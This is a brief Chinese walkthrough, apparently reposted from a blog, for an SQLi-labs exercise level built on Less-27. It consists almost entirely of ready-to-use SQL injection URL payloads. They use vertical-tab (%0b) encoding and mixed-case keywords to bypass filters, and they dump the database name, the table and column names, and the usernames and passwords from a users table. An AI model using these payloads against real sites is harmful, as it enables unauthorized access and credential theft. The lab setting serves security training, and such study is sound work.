1.这个和Less(27)差不多,就是把参数变成 id=(‘1‘)
2.爆破
(1)爆库:?id=0‘)%0buniOn%0bsElEct%0b1,database(),3%0bor%0b(‘1‘)=(‘1
(2)爆表:?id=0‘)%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema=‘security‘%0b%26%26%0b(‘1‘)=(‘1
(3)表列名:?id=0‘)%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema=‘security‘%0bAnd%0btable_name=‘users‘%0b%26%26%0b(‘1‘)=(‘1
(4)爆值:?id=0‘)%0buniOn%0bsElEct%0b1,(group_concat(username,0x7e,password)),3%0bfrom%0busers%0buniOn%0bseLect (1),(2),(‘(3
原文地址:https://www.cnblogs.com/meng-yu37/p/12403411.html
时间: 2024-10-07 22:45:31